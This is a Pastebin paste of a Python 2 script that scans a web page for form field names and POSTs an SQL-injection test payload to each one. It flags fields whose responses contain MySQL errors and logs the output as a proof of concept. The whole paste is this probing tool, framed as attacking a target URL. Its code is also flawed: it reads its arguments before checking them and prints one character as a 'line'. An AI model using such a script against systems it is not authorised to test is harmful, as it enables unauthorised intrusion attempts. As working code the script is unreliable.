SHARE
TWEET

webscan module - sqli module

a guest Mar 20th, 2013 150 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2.  
  3. # try_POST_sqli.py
  4. #
  5. # first we will GET argv[1]/page.argv[2] to read it
  6. # and find out what names/inputs/submits/etc... there are.
  7. # next we will POST those param-names separetly with 'payload'.
  8. #
  9. # more @ http://hauntit.blogspot.com
  10. # enjoy.
  11.  
  12. import urllib
  13. import urllib2
  14. import re
  15. import sys
  16. import httplib
  17.  
  18. host = sys.argv[1]
  19. path_file = sys.argv[2]
  20. url = host+':80'
  21.  
  22. url_file = url+path_file
  23.  
  24. payload = '\';]SQLI?^&*(O:UI:Y@:>T^#/**'
  25.  
  26. print 'Target: ',host
  27. print 'Vuln file: ',path_file
  28. print 'Full URL to attack:' ,url_file
  29. print
  30.  
  31. # first we must GET page, to read whole text to find
  32. # if there is any of our 'vulnerable' (to test) string.
  33. get_connect = urllib.urlopen('http://'+url_file)
  34. get_response = get_connect.read()
  35. status = get_connect.getcode()
  36.  
  37. print 'Status of requested page: ',status
  38.  
  39.  
  40. # what we're looking for:
  41. #results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
  42. results = re.findall(" name=\"([^\"]+)\"",get_response)
  43.  
  44. #############################################################
  45. # hm ;] one idea to test right now. ;D
  46. poc = open('log_file_with_sql_output.txt','w')
  47.  
  48. #############################################################
  49.  
  50. # func to send POST to target url+found parameter
  51. def do_post_now(url):
  52.   params = urllib.urlencode ( { results[i] : payload } )
  53.   headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
  54.   connect = httplib.HTTPConnection(url)
  55.   connect.request('POST', path_file, params, headers)
  56.   response = connect.getresponse()
  57.   print response.status, response.reason # 200 OK?
  58.   data = response.read()
  59.   connect.close() # end of test this parameter at this URL
  60.   y=0
  61.   line = data.find('MySQL')
  62.   if line != -1:
  63.     print '\t[+- (  POST SQLI alert!  ) -+]'
  64.     print '\t [+] Found sqli in line:' ,line
  65.     print data[y]
  66.     print poc.writelines(data)
  67.     #poc.close() # write&save simple p0c file. ;7
  68.     y=y+1
  69.    
  70. # end of do_post_now(url)
  71. # ---
  72.  
  73. # MAIN:
  74. if len(sys.argv) < 2:
  75.   sys.stderr.write('usage: '+sys.argv[0]+' localhost /path/2file.php')
  76.   sys.exit(1)
  77. else:
  78.  
  79.   # if result found:
  80.   if (len(results)>0):
  81.     print '-------------------------------------------------------------'
  82.     print 'Got some results :) Now we can try to exploit parameters.\n'
  83.  
  84.     i = 0 # next in list
  85.     while i < len(results):
  86.       print 'Found param called: ',results[i]  
  87.    
  88.       print 'Do POST now, for URL: ', url, ' with param: ', results[i]
  89.       do_post_now(url)
  90.       # end of this POST for this parameter
  91.  
  92.     # and next line:
  93.       i=i+1
  94.     # end of while i loop
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top